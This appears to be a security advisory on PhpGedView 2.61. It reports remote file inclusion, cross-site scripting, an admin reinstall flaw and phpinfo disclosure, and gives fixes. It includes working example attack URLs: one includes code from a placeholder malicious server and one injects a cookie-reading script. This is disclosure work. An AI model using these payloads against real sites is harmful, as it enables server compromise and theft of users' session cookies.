Description: Windak has reported multiple vulnerabilities in PhpGedView, which can be exploited by malicious people to compromise a vulnerable system or conduct cross-site scripting attacks.
1) Missing validation of input supplied to the "$PGV_BASE_DIRECTORY" variable in the "functions.php", "authentication_index.php", and "config_gedcom.php" scripts can be exploited to include arbitrary files on remote systems.
Example:
http://[victim]/functions.php?PGV_BASE_DIRECTORY=http://[malicious_server]/
2) Missing validation of input supplied to the "firstname" parameter in "search.php" can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
Example:
http://[victim]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script>
3) It is reportedly possible to reinstall and change the administrative password via "editconfig.php", if it hasn't been deleted after installation.
4) Various system information can be disclosed by supplying the string "phpinfo" to the "action" parameter in "admin.php".
Example:
http://[victim]/admin.php?action=phpinfo
The vulnerabilities have been reported in version 2.61. Other versions may also be affected.
Solution: Edit the source code to ensure that input is properly verified and remove the "editconfig.php" file.
Provided and/or discovered by: Windak, Vietnamese Security Group.
